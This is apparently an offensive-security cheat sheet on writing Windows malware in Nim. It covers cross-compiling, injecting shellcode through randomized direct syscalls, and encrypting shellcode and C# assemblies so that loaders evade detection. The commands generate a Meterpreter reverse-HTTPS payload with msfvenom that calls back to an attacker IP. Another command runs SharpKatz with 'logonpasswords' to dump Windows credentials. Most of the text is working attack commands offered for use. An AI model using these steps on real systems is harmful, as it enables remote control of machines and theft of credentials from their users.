Links

Nim

Install

Windows:
Linux:
$ sudo apt install mingw-w64 -y
$ sudo apt install nim -y
Or
$ curl https://nim-lang.org/choosenim/init.sh -sSf | sh
Dependencies:
Nim > nimble install winim nimcrypto zippy

Compilation

Basic:
Nim > nim c program.nim
To not popup the console window:
Nim > nim c --app:gui program.nim
For the best size:
Nim > nim c -d:danger -d:strip --opt:size --passC=-flto --passL=-flto program.nim
For Windows on Linux:
$ nim c --cpu:amd64 --os:windows --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc program.nim
Add the needed relocation section to the resulting executable (from Windows):
Nim > nim c --passL:-Wl,--dynamicbase,--export-all-symbols program.nim

Inject Shellcode

NimlineWhispers

How-to:
  1. 1.
    Generate a nim header with syscalls definitions (function names randomized): python3 NimlineWhispers.py --randomise.
  2. 2.
    Modify shellcode_bin.nim template to fit new function names.
  3. 3.
    Generate a shellcode of your choice, put it into the template and compile the binary: nim c -d=mingw --app=console --cpu=amd64 shellcode_bin.nim.

Encrypted

# Generate a shellcode
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.16.18 LPORT=443 -e x64/xor -b '\x00' -f csharp
# Copy the shellcode into the 1st template and compile
$ nim c encrypt_shellcode.nim
# Encrypt the shellcode and write contents into a file
$ ./encrypt_shellcode 'Passw0rd!' b64.txt
# Copy encrypted shellcode into the 2nd template and compile
$ cat b64.txt | xclip -i -sel c
$ nim c --cpu:amd64 --os:windows --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc -d:danger -d:strip --opt:size --passC=-flto --passL=-flto encrypted_shellcode_loader_syscalls.nim

Execute C# Assemblies

$ pwsh -exec bypass
PS > . ./CSharpToNimByteArray.ps1
PS > CSharpToNimByteArray -inputfile csharp.exe
Nim > nim c --passL:-Wl,--dynamicbase,--export-all-symbols execute_assembly_bin.nim

Encrypted

$ nim c encrypt_assembly.nim
$ nim c --cpu:amd64 --os:windows --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc -d:danger -d:strip --opt:size --passC=-flto --passL=-flto encrypted_assembly_loader.nim
$ ./encrypt_assembly 'Passw0rd!' SharpKatz.exe b64.txt
Cmd > .\encrypted_assembly_loader.exe Passw0rd! b64.txt --Command logonpasswords

Tools & Packers